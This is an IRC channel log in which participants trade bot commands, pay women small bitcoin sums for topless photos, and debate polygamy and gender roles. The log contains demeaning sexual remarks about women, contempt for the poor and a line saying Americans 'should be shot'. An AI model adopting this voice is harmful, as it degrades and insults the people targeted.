it'd be neat if deedbot would pm folks upon invoicing 1801487;1524023750;trinque;yep, I have that in a list o' mine 1801488;1524023755;ben_vulpes;neato 1801489;1524023764;trinque;also boop the invoicer when paid/rejected 1801490;1524023773;ben_vulpes;similarly neat 1801491;1524023896;mircea_popescu;!!rate rittah 1 pretty good she says, though she still can't take athene. 1801492;1524023898;deedbot;Get your OTP: http://p.bvulpes.com/pastes/nl6FS/?raw=true 1801493;1524023992;mircea_popescu;!!up kloecat 1801494;1524023993;deedbot;kloecat voiced for 30 minutes. 1801495;1524024000;kloecat;😀 1801496;1524024036;kloecat;here for the tit pic 1801497;1524024064;mircea_popescu;kloecat, 10b7f860. you got half hour. 1801498;1524024448;mircea_popescu;!!up rittah 1801499;1524024449;deedbot;rittah voiced for 30 minutes. 1801500;1524024476;rittah;whats this link danielpbarron sent? 1801501;1524024501;trinque;danielpbarron: are you picking on the women? 1801502;1524024517;danielpbarron;yes 1801503;1524024527;trinque;sad cranky man 1801504;1524024634;mircea_popescu;rittah, he holds firm if peculiar religious beliefs. 1801505;1524024673;trinque;I'm about to turn in; anybody that wants a !!withdraw tonight, do it nao 1801506;1524024727;*;mircea_popescu confirmed the batch, so should be all good. 1801507;1524024782;trinque;kk 1801508;1524024846;hanbot;mircea_popescu> ask hanbot she loved it lol << oh man visinata was great. and ckang no, not really --who gets drunk on cordials?! 1801509;1524024874;mircea_popescu;hey, you can get stone drunk by just hanging about the cellar where the tuica still is running for a few hours. 1801510;1524024876;mircea_popescu;i've seen it. 1801511;1524025961;trinque;ahahaha bitches broke my shredder! 1801512;1524025969;trinque;what a life 1801513;1524026018;ben_vulpes;cot dayum 1801514;1524026100;hanbot;poor trinque, pizarro box gets chewed on, deedbot takes various dings, then gets deluged by crackwhores! 1801515;1524026126;ben_vulpes;trinque: tried to shred 20 at once or what 1801516;1524026192;ckang;!!up kloecat 1801517;1524026193;deedbot;kloecat voiced for 30 minutes. 1801518;1524026202;trinque;naw, crappy shredder, and was collecting bits in the crevices 1801519;1524026211;trinque;hanbot: notbad.jpg stress test! 1801520;1524026212;ckang;mircea_popescu: other girl when ghost so im re-using the account i made for her 1801521;1524026217;ckang;if you have another # 1801522;1524026222;mircea_popescu;um. 1801523;1524026233;mircea_popescu;because why, because i'd totally know it wasn't the original girl ? 1801524;1524026253;ckang;no but im just being upfront 1801525;1524026282;mircea_popescu;rittah, ima confirm your rating later ; if you want to hang around you'll be able to voice yourself tomorrow, say !!up to deedbot in pm then vertify the string it gives you. 1801526;1524026450;kloecat;mircea_popescu: may I have a number? 1801527;1524026489;ckang;rittah has irccloud on her phone btw so she can check it later 1801528;1524026489;mircea_popescu;kloecat, http://btcbase.org/log/2018-04-18#1801497 1801529;1524026489;a111;Logged on 2018-04-18 04:01 mircea_popescu: kloecat, 10b7f860. you got half hour. 1801530;1524026591;phf;who is number one? -- you're number six. -- i'm not a number! i'm a free man! 1801531;1524026921;ckang;lol danielpbarron I looked at the link you are sending, if you expect any of these girls to read all that... 1801532;1524026932;ckang;you may want to condense it down a little 1801533;1524027180;ben_vulpes;douchebag: pizarro board has serious reservations about your fucking up our honorsystem ip routing table and bringing dos/whatever hell down upon our little gated community, can i extract a commitment from you to not misbehave in my cab? 1801534;1524027434;kloecat;https://usercontent.irccloud-cdn.com/file/S0Ju86zg/image.jpg 1801535;1524027471;kloecat;ignore the tobacco pipe 😄 1801536;1524027494;ben_vulpes;lol and the pothat? 1801537;1524027515;kloecat;legal here 😋 1801538;1524027539;ben_vulpes;is the bong not? or why the concern 1801539;1524027571;kloecat;some guys think girls that smoke are trashy, i didnt want to set that expectation because its not entirely true 1801540;1524027630;ben_vulpes;yeah i don't really understand what you're trying to say. nice nips tho! 1801541;1524027664;kloecat;thank you 🤣 1801542;1524027713;kloecat;danielpbarron> Daniel P. Barron http://www.atruechurch.info/women.html 1801543;1524027715;kloecat;? 1801544;1524027744;ben_vulpes;full of questions this one 1801545;1524027769;kloecat;I'll be quiet like a good girl then sorry :( 1801546;1524027774;trinque;danielpbarron's doing that negging thing, but with christ 1801547;1524027779;lobbes;lol. he's scaring away the cute ones but was silent for trucker hos 1801548;1524027786;kloecat;its not working, btw 1801549;1524027787;trinque;lobbes: telling eh? 1801550;1524027804;trinque;wiener moves a little and he's gotta get mad at them for it 1801551;1524027807;kloecat;I instantly closed it 1801552;1524027809;ben_vulpes;kloecat: good girls ask good questions 1801553;1524027836;ben_vulpes;how d'you know ckang? 1801554;1524027862;kloecat;through a MMJ community 1801555;1524027885;kloecat;Trying to decide on dinner, suggestions? 1801556;1524027891;ben_vulpes;you gotta own that bong, girl. 1801557;1524027905;ben_vulpes;kloecat: how about a big steak and salad 1801558;1524027928;kloecat;ordering a steak on uber eats feels wrong 1801559;1524027941;ben_vulpes;oh christ you're ordering it, why not just make it 1801560;1524027961;kloecat;because I don't have a huge steak reserve lol 1801561;1524027965;ben_vulpes;also what's so wrong about making the gig economy scum work for their food credits? 1801562;1524027975;kloecat;and its 10pm 1801563;1524027992;ben_vulpes;perhaps it is the perverse fun of telling folks to lick between your toes that you feel 1801564;1524027993;trinque;house trinque *cooked* salmon, sprouts, and broccolini. 1801565;1524028007;ben_vulpes;!!up kloecat 1801566;1524028007;deedbot;kloecat voiced for 30 minutes. 1801567;1524028013;kloecat;mmm that does sound good trinque 1801568;1524028058;kloecat;ben_vulpes I try to cook, I really hate cleaning though 1801569;1524028068;trinque;get some pesto in there, pine nuts, good stuff 1801570;1524028070;kloecat;cooking is the fun part anyways 1801571;1524028072;ben_vulpes;trinque: i've been waging battle on the brussel sprouts of late 1801572;1524028085;trinque;one of my favorite veggies. 1801573;1524028097;ben_vulpes;NIGHTSHADES! POISON! 1801574;1524028104;kloecat;I LOVE broccoli 1801575;1524028144;trinque;ben_vulpes: I get 'em from the filthy farmer's market even 1801576;1524028152;ben_vulpes;trinque: kiddo figured out burritos today 1801577;1524028184;ben_vulpes;trinque: don't you know that vegetables that don't arrive perfect under florescent lights will kill you with shit particles? 1801578;1524028184;trinque;haw, how'd he do keeping the food tube intact 1801579;1524028211;ben_vulpes;well he wanted to flatten it at first, and then the week's struggle of "no eat it over your plate" commenced 1801580;1524028245;mircea_popescu;phf, was that an old iron maiden album ? 1801581;1524028252;mircea_popescu;ckang, link ? 1801582;1524028295;mircea_popescu;ben_vulpes, you can just null root his ip if you get complaints you care about, what's the concern exactly ? 1801583;1524028295;deedbot;http://pizarroisp.net/index.php/2018/04/18/rockchips-for-rent/ << PizzaroISP - Rockchips for rent! 1801584;1524028297;ckang;•kloecat> https://usercontent.irccloud-cdn.com/file/S0Ju86zg/image.jpg 1801585;1524028326;mircea_popescu;!!pay kloecat 0.02 1801586;1524028331;deedbot;Get your OTP: http://p.bvulpes.com/pastes/t8tkC/?raw=true 1801587;1524028343;kloecat;Ty mircea_popescu 1801588;1524028354;kloecat;Any ideas for dinner? 1801589;1524028360;ben_vulpes;mircea_popescu: i do not believe that we have that degree of control over the routing with the current switch, but i'll let asciilifeform/ascii_lander raise the objections 1801590;1524028368;ben_vulpes;elaborate, i should say 1801591;1524028396;*;ben_vulpes bbl, will attend to the rockchip-seeky later 1801592;1524028476;mircea_popescu;kloecat, what do you mean, for dinner ? 1801593;1524028503;kloecat;Trying to decide what to make or order and everything I think of sounds pretty meh 1801594;1524028523;mircea_popescu;ben_vulpes, i dunno, in principle the idea was that pizarro also sells to the general public ; has this changed ? and if you want people to make specific representations, that's one thing, but ~vague~ representations ? 1801595;1524028546;mircea_popescu;kloecat, lessee... 1801596;1524028619;kloecat;So far, only suggestion is steak and salad 1801597;1524028647;mircea_popescu;kloecat, http://trilema.com/2014/heretic-salmon-teriyaki/ ? 1801598;1524028685;kloecat;You know, salmon was the other suggestion 1801599;1524028717;mircea_popescu;hm. 1801600;1524028746;mircea_popescu;http://trilema.com/2013/pasta-tikka-masala/ ? 1801601;1524028783;mircea_popescu;or i guess http://trilema.com/2017/the-famous-roasted-bird-soup-salata-de-boeuf-transform/ if you like leftovers. 1801602;1524028799;mircea_popescu;ahaha "Bon Apres-Tit!" even 1801603;1524028853;mircea_popescu;http://btcbase.org/log/2018-04-18#1801539 << ahahaha lmfao. 1801604;1524028853;a111;Logged on 2018-04-18 04:59 kloecat: some guys think girls that smoke are trashy, i didnt want to set that expectation because its not entirely true 1801605;1524028862;mircea_popescu;!!rate kloecat 1 not entirely trashy. 1801606;1524028865;deedbot;Get your OTP: http://p.bvulpes.com/pastes/HBOq6/?raw=true 1801607;1524028879;trinque;I'm not a madadm; I'm a concierge! 1801608;1524028914;mircea_popescu;trinque, i see your going to bed is not so different from your being awake. #trilema miracles. 1801609;1524028945;trinque;suddenly there was another pizarro toy to investigate 1801610;1524028953;trinque;also tits. 1801611;1524028958;kloecat;wow mircea_popescu sounds like you eat well 1801612;1524028991;mircea_popescu;kloecat, would you like me to teach you latin ? 1801613;1524029060;kloecat;hmm, antiquated language outside of science? isn't it? 1801614;1524029104;mircea_popescu;no, actually. it's the benchmark used to evaluate the earthly progress by the extraterrestrial intelligence in charge of the petri dish. 1801615;1524029171;kloecat;Woosh, way over my head :) 1801616;1524029177;mircea_popescu;:p 1801617;1524029222;deedbot;http://danielpbarron.com/2018/harlotry/ << Daniel P. Barron - Harlotry 1801618;1524029226;mircea_popescu;it's a trilema reference ; mostly there to show the churchly folk that i can outquote them on scriptures! 1801619;1524029233;mircea_popescu;anyway, so what do you do for a living kloecat ? 1801620;1524029286;kloecat;I work at a MMJ coop 1801621;1524029295;mircea_popescu;as a what ? 1801622;1524029307;kloecat;you? 1801623;1524029320;kloecat;medical marijuana cooperative 1801624;1524029329;mircea_popescu;i'm a rich guy. 1801625;1524029342;kloecat;Lucky lol 1801626;1524029353;ckang;!!up xtina9 1801627;1524029354;deedbot;xtina9 voiced for 30 minutes. 1801628;1524029361;mircea_popescu;yes, i get it, but "i work at a building" doesn't say much. do you clean the floors ? design the marketiung materials ? what. 1801629;1524029386;mircea_popescu;kloecat, actually, wealth and luck are about as distant as health and beauty. 1801630;1524029411;xtina9;📷 1801631;1524029443;mircea_popescu;don't tell me there's an utf for tits. 1801632;1524029464;kloecat;Some are blessed with it, others aren't as lucky I suppose :) 1801633;1524029475;xtina9;Sry, camera 1801634;1524029479;mircea_popescu;holy shit these useless fucktards, they got EVERYTHING in there, fifty billion codepoints, no tits ?! 1801635;1524029488;mircea_popescu;usians should be shot already. 1801636;1524029499;mircea_popescu;xtina9, 6d4c4c57. half hour. 1801637;1524029530;mircea_popescu;kloecat, wealth is merely the measure of personal superiority. it has nothing to do with blessings, luck, bla bla. the poor suck and the rich don't, that's the whole story. 1801638;1524029550;kloecat;What about those born in to wealth? 1801639;1524029563;kloecat;Vs those who earned it themselves 1801640;1524029607;mircea_popescu;well, for instance when i used to own horses, the foals of champions were better than the foals of roadkill. 1801641;1524029610;mircea_popescu;same principle. 1801642;1524029648;kloecat;What if someone is born in to money but has poor genes, thinking royal family, for example 1801643;1524029650;mircea_popescu;though they don't usually live up to the legacy of their parents, nevertheless people born rich are actually better stock. though generally they manage to fuck themselves/get fucked over in the nurture side of things. 1801644;1524029698;mircea_popescu;kloecat, royals aren't wealthy in this sense. a bunch of retards getting together and conventionally giving all their money to one retard however picked, be it bill gates or louis the locksmith don't count for much. 1801645;1524029733;kloecat;That was the only example I could think of quickly 1801646;1524029757;mircea_popescu;i suspect if i came from a long dynastic line, to the point of actual degeneracy, you'd not need to ask what i do. 1801647;1524029773;kloecat;They do live a privileged lifestyle though compared to others, earn or not 1801648;1524029781;*;mircea_popescu wonders if anyone asks say the shithead of wales. "so charles... what is it you do darling ?" "ummmm... charitywork" 1801649;1524029787;kloecat;earned sorry 1801650;1524029810;mircea_popescu;kloecat, whole fucking point of life, ain't it ? "priviledged as compared to the scum" 1801651;1524029871;mircea_popescu;!!up kloecat 1801652;1524029871;deedbot;kloecat voiced for 30 minutes. 1801653;1524029889;mircea_popescu;http://btcbase.org/log/2018-04-18#1801532 << no but see, certification problem. he can't alter it without breaking the seal. 1801654;1524029889;a111;Logged on 2018-04-18 04:48 ckang: you may want to condense it down a little 1801655;1524029890;kloecat;Oh thought I said something wrong :( 1801656;1524029910;mircea_popescu;kloecat, it only voices you for half hour at a time. ima rate you in a moment then you can voice yourself, send !!up to it in pm. 1801657;1524029923;kloecat;Oh cool ok, whew 1801658;1524029962;mircea_popescu;anyway, #trilema is one of the few remaining free places, you can say pretty much whatever. 1801659;1524030012;kloecat;I guess I can't understand the flip side of the coin regarding born wealthy and its genetic superiority 1801660;1524030029;mircea_popescu;which flipside is that ? 1801661;1524030033;kloecat;Most rich or well off guys I know haven't exactly been the best looking 1801662;1524030058;mircea_popescu;not much of a criteria, is it ? 1801663;1524030075;kloecat;What do you mean? 1801664;1524030081;trinque;!!v C8DDC311D292D425F787BE9132525C18B196A093D1C0514C7228C79581D31FCE 1801665;1524030087;deedbot;trinque paid ben_vulpes invoice 5 1801666;1524030100;mircea_popescu;kloecat, i mean, what difference does it make if they're "good looking" ? 1801667;1524030151;mircea_popescu;danielpbarron, are you seriously proposing the titscript defiles #trilema ? 1801668;1524030153;kloecat;http://www.oprah.com/oprahshow/measuring-facial-perfection-the-golden-ratio 1801669;1524030177;mircea_popescu;kloecat, how about you read http://trilema.com/2015/the-genetics-of-intelligence/ and then we continue this. 1801670;1524030200;kloecat;May we later? I am going to run and get some food :) 1801671;1524030203;mircea_popescu;sure. 1801672;1524030221;kloecat;byebye thanks again 1801673;1524030263;mircea_popescu;http://blog.esthlos.com/?p=7 btw 1801674;1524030292;mircea_popescu;(lisp v implementation by esthlos ) 1801675;1524030309;xtina9;https://usercontent.irccloud-cdn.com/file/EITRlpMA/image.jpg 1801676;1524030331;xtina9;http://danielpbarron.com/2018/harlotry/ ??? 1801677;1524030342;mircea_popescu;xtina9, do one with your head actually in it ; and with all 8 digits not just 7. 1801678;1524030393;xtina9;crap sorry let me remake must have copied down wrong 1801679;1524030449;danielpbarron;is #trilema a nation? 1801680;1524030462;mircea_popescu;indeed. 1801681;1524030481;mircea_popescu;as far as i can discern it's the only nation. 1801682;1524030495;danielpbarron;harlotry defiles a nation 1801683;1524030539;danielpbarron;the tit pics in and of themselves do not constitute harlotry, but probably tie into it in one way or another 1801684;1524030569;ckang;kloecat seems like she has an ok head on her boobs 1801685;1524030590;ckang;ive dated worse anyways 1801686;1524030641;mircea_popescu;ckang, so far she's lively enough, but it's not clear whether substance behind it or not. 1801687;1524030661;mircea_popescu;danielpbarron, how do you distinguish female submission from female prostitution ? 1801688;1524030693;danielpbarron;a woman should only have one male sexual partner 1801689;1524030710;mircea_popescu;(likbez : the "whores of babylon" that the period jews took exception to were in fact ~worshipful~. the way the middle kingdom did reproduction was ritual gangbangs.) 1801690;1524030748;mircea_popescu;danielpbarron, you know this female-mated-for-life paradigm is possibly the worst arrangement from a purely biologic perspective. 1801691;1524030772;danielpbarron;no i do not 1801692;1524030788;mircea_popescu;hm. 1801693;1524030847;mircea_popescu;what'd illustrate it for you ? 1801694;1524030883;danielpbarron;if your excellent works of fiction haven't, i don't know what could 1801695;1524030908;mircea_popescu;well then i guess we shall table the matter. 1801696;1524031161;mircea_popescu;!!up xtina9 1801697;1524031162;deedbot;xtina9 voiced for 30 minutes. 1801698;1524031164;xtina9;https://usercontent.irccloud-cdn.com/file/sMJFZxr7/Image2.jpg 1801699;1524031192;mircea_popescu;!!pay xtina9 0.02 1801700;1524031202;mircea_popescu;so what do you do for a living, xtina9 ? other than praising the lord, of course. 1801701;1524031208;deedbot;Get your OTP: http://p.bvulpes.com/pastes/xVtQt/?raw=true 1801702;1524031214;xtina9;ty, im friends with kloecat 1801703;1524031222;mircea_popescu;oh, it pays that well ? :D\ 1801704;1524031243;xtina9;I wish 1801705;1524031246;mircea_popescu;lol. 1801706;1524031254;xtina9;I work at a golf course 1801707;1524031262;mircea_popescu;what do you do there ? 1801708;1524031264;xtina9;'beer bitch' 1801709;1524031271;mircea_popescu;nude ? 1801710;1524031272;xtina9;as some call me 1801711;1524031286;xtina9;no, not at a golf course haha 1801712;1524031291;xtina9;too distracting 1801713;1524031317;mircea_popescu;it strikes me this'd be a great golf course. "we only hire girls with cheerleading past. they get you beers and w/e, and are not dressed above the ankles." 1801714;1524031322;xtina9;I mostly deliver beverages and spare golf balls 1801715;1524031351;xtina9;although I do meet many man, most married but all dogs 1801716;1524031357;xtina9;men sorry 1801717;1524031369;danielpbarron;so what if married? 1801718;1524031389;xtina9;a band is the 1st thing a woman looks for danielpbarron 1801719;1524031397;danielpbarron;silly 1801720;1524031404;xtina9;why? 1801721;1524031408;mircea_popescu;lol danielpbarron has an aggenda! 1801722;1524031423;danielpbarron;it's not wrong for a man to have more than one wife 1801723;1524031431;xtina9;o.o 1801724;1524031441;mircea_popescu;how about a wife and a beer bitch ? 1801725;1524031462;xtina9;this is not legal in the USA danielpbarron 1801726;1524031482;mircea_popescu;xtina9, i believe the current workaround is to observe that ~registration~ is not legal. 1801727;1524031497;danielpbarron;xtina9, that is a wicked law 1801728;1524031511;mircea_popescu;legal to be "married" to as many women as you please as long as you don't attempt to register it with the usg.deedbot 1801729;1524031531;xtina9;its doesn't work in utah 😎 1801730;1524031552;danielpbarron;marraige before God does not require registration 1801731;1524031553;mircea_popescu;btw danielpbarron are there any wicked places ? 1801732;1524031560;xtina9;which you figure would be one place it did 1801733;1524031565;mircea_popescu;like utah ? new york ? something ? 1801734;1524031577;danielpbarron;places? what place isn't wicked? 1801735;1524031588;mircea_popescu;well, so are all laws wicked ? 1801736;1524031602;mircea_popescu;xtina9, you know, the mormons had their civilwar-lite over the matter. they lost. 1801737;1524031614;danielpbarron;not all. law against murder is ok 1801738;1524031626;danielpbarron;mormonism leads to hell btw 1801739;1524031641;xtina9;I know they have tried before without luck, it's been in the news several times 1801740;1524031663;danielpbarron;is it legal to fuck multiple girlfriends? 1801741;1524031676;mircea_popescu;danielpbarron, so how can there be nonwicked laws if there can't be nonwicked places ? 1801742;1524031704;mircea_popescu;kloecat, rittah i rated you dollies ; !!up to deedbot in pm to talk. 1801743;1524031745;danielpbarron;God has put the governing authorities in place to be a terror for wicked men; that doesn't mean the governments themselves aren't also wicked 1801744;1524031777;danielpbarron;this whole world is under the sway of the wicked one 1801745;1524031790;xtina9;isn't there a clause about the law of the land? 1801746;1524031802;danielpbarron;in what? 1801747;1524031815;xtina9;idk, the bible 1801748;1524031873;danielpbarron;please to show me which verse 1801749;1524032065;xtina9;I couldn't tell you offhand, not studied 1801750;1524032187;danielpbarron;mircea_popescu, that's a point though, even the law against murder is bungled up. should take multiple witnesses, and then public execution; not circumstantial evidence and imprisonment 1801751;1524032207;mircea_popescu;afaik you still can't get a murder conviction on circumstantial evidence. 1801752;1524032215;mircea_popescu;but everyone is so keen to "plea bargain". 1801753;1524032218;mircea_popescu;now that's an idea for the books. 1801754;1524032268;xtina9;https://bible.org/seriespage/26-laws-land-romans-131-14 1801755;1524032283;mircea_popescu;check out the inquisitive golf girl 1801756;1524032338;danielpbarron;ah, xtina9 that is the passage we are already discussing 1801757;1524032365;xtina9;oh, sorry 1801758;1524032401;danielpbarron;is it illegal for a married man to have sex with a woman who is not his wife? 1801759;1524032433;xtina9;by the land, no 1801760;1524032436;mircea_popescu;danielpbarron, i thought you didn;'t even thinkl that is ~possible~. wasn't your standard for wifehood cocktaking ? 1801761;1524032442;danielpbarron;so there you go! 1801762;1524032464;xtina9;but under god, isn't that adultery ? 1801763;1524032497;danielpbarron;yes, before God that constitutes marraige, but the "law of the land" .. it doesn't 1801764;1524032523;danielpbarron;xtina9, not unless the other woman is married to another man 1801765;1524032585;xtina9;hm 1801766;1524032601;danielpbarron;xtina9, see http://atruechurch.info/polygamy.html 1801767;1524032635;xtina9;how can you be confident that you are right? 1801768;1524032676;danielpbarron;the Bible says so 1801769;1524032690;mircea_popescu;she has a good point there... if you're right you're right, but if you overlooked something... look out below.\ 1801770;1524032701;mircea_popescu;danielpbarron, doesn't the similarity to running bitcoin code strike you btw ? 1801771;1524032708;mircea_popescu;"is this secure ?" "i fucking well hope so!" 1801772;1524032809;danielpbarron;if the Bible is wrong, what's the harm to me? ever heard of pascal's wager? 1801773;1524032820;mircea_popescu;maybe you read it wrong 1801774;1524032861;danielpbarron;am i interpreting it right? 1801775;1524032881;danielpbarron;the Bible that is, is that what you meant 1801776;1524032943;mircea_popescu;you got a pile of code, bitcoinsource=bible, which translates an ideal, thewillofgod=functioningbitcoin, into a real, actionable, existent item. 1801777;1524032950;mircea_popescu;right or wrong, you're eating the result. 1801778;1524032953;mircea_popescu;so you'd better be right. 1801779;1524032957;lobbes;danielpbarron, but how do you reconcile the question of: "how do I know that the bible is actually the word of god if the only sources saying it *is* are $not-god?" 1801780;1524032971;mircea_popescu;lobbes, the latter's not the case. 1801781;1524032998;danielpbarron;lobbesbot, the Bible is God and it says it is true 1801782;1524033023;mircea_popescu;wait wait, hold up there. the bible is god now ? 1801783;1524033045;mircea_popescu;"the father, the son, the holy spirit AND THE HOLY WRIT ? FOUR PERSONS ?" 1801784;1524033054;danielpbarron;!~bible john 1:1 1801785;1524033055;jhvh1;danielpbarron: [KJV] John 1:1 :: In the beginning was the Word, and the Word was with God, and the Word was God. 1801786;1524033092;mircea_popescu;but logos is != bible. 1801787;1524033127;danielpbarron;more than four, God s also the city of Jerusalem, the 7 spirits of God, the 4 horsemen of zechariah, the 3 men who visited abraham and the 2 that went away to destroy sodem, and there's more still 1801788;1524033144;mircea_popescu;(this line, incidentally, is how various heretics end up trying to shove printed bibles up their butts / open randomly to divine future / kloink people over head with it to cure warts and so on) 1801789;1524033185;mircea_popescu;danielpbarron, so is this doctrine of textual divinity your own or darwin fish's too ? 1801790;1524033242;danielpbarron;!~bible john 1:14 1801791;1524033243;jhvh1;danielpbarron: [KJV] John 1:14 :: And the Word was made flesh, and dwelt among us, (and we beheld his glory, the glory as of the only begotten of the Father,) full of grace and truth. 1801792;1524033285;mircea_popescu;i had nfi melchisedechianism actually survived into the 3rd millenium. 1801793;1524033289;danielpbarron;mircea_popescu, both. i was aware f this one befoe having found atruechurch 1801794;1524033300;mircea_popescu;as far as anyone knew, it was extinct during the 1st. 1801795;1524033313;danielpbarron;i had to repent on the multiple wives thing, and free will 1801796;1524033346;mircea_popescu;danielpbarron, your stronghold is tephrike :D (nowadays a small turkish town) 1801797;1524033373;danielpbarron;i'm half armenian you know? 1801798;1524033381;mircea_popescu;apparently it shows. 1801799;1524033544;mircea_popescu;danielpbarron, if it's not prying, what % women compose those "approximately 50" atc believers ? 1801800;1524033572;mircea_popescu;!!up xtina9, 1801801;1524033572;deedbot;xtina9, voiced for 30 minutes. 1801802;1524033576;mircea_popescu;!!up xtina9 1801803;1524033576;deedbot;xtina9 voiced for 30 minutes. 1801804;1524033589;xtina9;hi 1801805;1524033600;mircea_popescu;heya. 1801806;1524033606;danielpbarron;50% or more 1801807;1524033612;xtina9;sorry but reading above I dont really agree with you danielpbarron 1801808;1524033635;danielpbarron;with what do you not agree? 1801809;1524033646;mircea_popescu;!!rate xtina9 1 who knows, maybe she makes bishopress. NUDE bishopress 1801810;1524033649;deedbot;Get your OTP: http://p.bvulpes.com/pastes/GYMbq/?raw=true 1801811;1524033655;xtina9;seems like its made to suit you but not anyone else 1801812;1524033673;mircea_popescu;xtina9, you think having a buncha cowives sucks ? 1801813;1524033689;danielpbarron;because i'm a man? or something else? 1801814;1524033694;xtina9;hmm, as long as it doesn't put one into legal risk 1801815;1524033704;xtina9;freedom is to be valued 1801816;1524033727;mircea_popescu;danielpbarron, is manhood automatic btw ? how do you know you're a man as per atc definition of ~ ? 1801817;1524033728;danielpbarron;i have zero wives for whatever that is worth 1801818;1524033761;danielpbarron;i'm not effeminate 1801819;1524033787;mircea_popescu;well what is this, 20 questions ? the box on my desk is not aeroplany, either, but this doesn't make it a computer. 1801820;1524033794;danielpbarron;the effeminate males do not inherit the kingdom of God 1801821;1524033816;danielpbarron;if a male is not a man, he goes to hell. 1801822;1524033824;mircea_popescu;but how do you know ? 1801823;1524033848;danielpbarron;can't be a coward 1801824;1524033890;mircea_popescu;suppose as you age you get tits. i'm not talking little wasp bites, nice c-cups. it's not THAT rare in eastern fenotypes. is it hell for you ? 1801825;1524033937;danielpbarron;not inherently 1801826;1524033951;danielpbarron;effeminate is a way of acting and dressing 1801827;1524033980;mircea_popescu;so could xtina9 be a man if she wasn't cowardly and took her dressing style off trilema headers ? 1801828;1524034020;mircea_popescu;women are not innately cowardly in my experience. children are, yes, but past the age of about 6 or 7 it's pretty much all nurture. 1801829;1524034041;danielpbarron;ma7be i mispoke, women should not be cowards either 1801830;1524034075;mircea_popescu;well that kinda takes you back to square one in our game of "how do you know". 1801831;1524034147;danielpbarron;a man should not behave like a woman, and a woman should not behave like a man. a woman should be submissive 1801832;1524034167;mircea_popescu;so if i say "hey x, how about you do y" and x does y, x goes to hell ? 1801833;1524034187;danielpbarron;see http://www.atruechurch.info/women.html 1801834;1524034214;danielpbarron;mircea_popescu, if x doesn't repent, yes 1801835;1524034234;danielpbarron;and if y is a wicked thing to do 1801836;1524034236;mircea_popescu;but i mean how the fuck are we supposed to get anything done like this ? 1801837;1524034247;mircea_popescu;mmm. no, y is a perfectly fine thing to do. 1801838;1524034275;danielpbarron;be what standard? 1801839;1524034300;mircea_popescu;consider -- submission is an inescapable part of life. you go to park the car, the park attendant points one way, you steer that way. because wtf, of course you're gonna be submissive to the parkling attendant, what, pick parking lot fights over not going to hell ? 1801840;1524034469;danielpbarron;ah. ook. woman was created to be a help for man. she should be subserviant to her husband. an effeminate man allows his wife to rule over him 1801841;1524034503;mircea_popescu;well yes, but that's not very interesting for what we're discussing. 1801842;1524034633;danielpbarron;believers are to be servents like Christ was a servant; it is not effeminate to folow direction or to help another. effeminate speaks more to the interplay between husband and wife 1801843;1524034751;danielpbarron;but also mentioned in close context to homosexuality. it is not good for a man to behave like a woman sexually with another man 1801844;1524034783;danielpbarron;am i having sex with the parking attendant? no. 1801845;1524034864;mircea_popescu;so as long as you don't fuck dudes and aren't cowardly you know that a) you're a man and b) behaving manly ? 1801846;1524034890;mircea_popescu;it's not a very high standard so far. my car, for isntance, meets it. 1801847;1524034974;danielpbarron;woman came from man, and men come from women; your car does not 1801848;1524035017;ckang;!!up clarissa1 1801849;1524035018;deedbot;clarissa1 voiced for 30 minutes. 1801850;1524035036;danielpbarron;have you come to explain it all, clarissa1 ? 1801851;1524035047;clarissa1;Hi mircea_popescu im here for the picture :) 1801852;1524035058;clarissa1;I can't i do remember that show though lol 1801853;1524035075;danielpbarron;must be about my age then 1801854;1524035090;clarissa1;had older siblings 1801855;1524035094;lobbes;Lol, glad someone made that horrible joke 1801856;1524035112;mircea_popescu;danielpbarron, would you be happier if i had said my horse ? not like the car came from the sky, it came from man. 1801857;1524035113;clarissa1;what an odd show though, an alligator? 1801858;1524035127;mircea_popescu;clarissa1, 08ef3c6a. half hur. 1801859;1524035150;mircea_popescu;lobbes, explain it to me ? i musta missed some shows! 1801860;1524035189;lobbes;Nah, only a clarissa can explain. 1801861;1524035244;danielpbarron;mircea_popescu, came from as in flesh. the animals were created separately; woman was different in that she was made specifically from man's flesh 1801862;1524035313;mircea_popescu;danielpbarron, ok, but i think you see the broader point here. 1801863;1524035323;danielpbarron;it's a nickelodian show from the 90s 1801864;1524035421;danielpbarron;the rite of passage you are looking for is faith, without which you should do as you please 1801865;1524035629;lobbes;(Not a particularly good show either, but.. good nostalgia item) 1801866;1524035709;lobbes;danielpbarron, ok but say a male has faith, isn't a coward, doesn't fuck dudes, but his junk gets blown off in an explosion. Is he still a man? 1801867;1524035814;danielpbarron;sure, he might even intentionally chop it off because it "offended him" 1801868;1524035817;mircea_popescu;i suppose that ties it up then, you're a man because you have faith and follow the writ, which you do because you're a man and there's an end to it. 1801869;1524035937;danielpbarron;i know, it's circular logic; you can only believe it if God wills it 1801870;1524035954;mircea_popescu;at least it's a bounded system. 1801871;1524036126;lobbes;And intentionally chop off?? Phew. Now that's what I call faith 1801872;1524036287;ckang;!!up kathearin 1801873;1524036287;deedbot;kathearin voiced for 30 minutes. 1801874;1524036310;danielpbarron;!~bible mat 5:27-30 1801875;1524036311;jhvh1;danielpbarron: [KJV] Matthew 5:27 :: Ye have heard that it was said by them of old time, Thou shalt not commit adultery: 1801876;1524036313;jhvh1;danielpbarron: [KJV] Matthew 5:28 :: But I say unto you, That whosoever looketh on a woman to lust after her hath committed adultery with her already in his heart. 1801877;1524036313;jhvh1;danielpbarron: [KJV] Matthew 5:29 :: And if thy right eye offend thee, pluck it out, and cast it from thee: for it is profitable for thee that one of thy members should perish, and not that thy whole body should be cast into hell. 1801878;1524036314;jhvh1;danielpbarron: [KJV] Matthew 5:30 :: And if thy right hand offend thee, cut if off, and cast it from thee: for it is profitable for thee that one of thy members should perish, and not that thy whole body should be cast into hell. 1801879;1524036323;kathearin;Here for photo mircea_popescu 1801880;1524036351;mircea_popescu;kathearin, a92dad40. half hour. 1801881;1524036500;ckang;helping clarissa1 get it uploaded now 1801882;1524036517;ckang;timing out for some reason going to try email 1801883;1524036527;lobbes;Anyways, damn #trilema vortex waylaid my own bed course. Enjoy the night all. Nice talkin' danielpbarron 1801884;1524036553;danielpbarron;heh i'm past my bedtime too. goodnight lobbes 1801885;1524036560;ckang;nn 1801886;1524037326;kathearin;https://usercontent.irccloud-cdn.com/file/680JDaQT/image.jpg 1801887;1524037429;mircea_popescu;works. 1801888;1524037433;mircea_popescu;!!pay kathearin 0.02 1801889;1524037442;deedbot;Get your OTP: http://p.bvulpes.com/pastes/KnDSo/?raw=true 1801890;1524037469;kathearin;lol what is this http://danielpbarron.com/2018/harlotry/ 1801891;1524037548;mircea_popescu;kathearin, check out the log, it's been 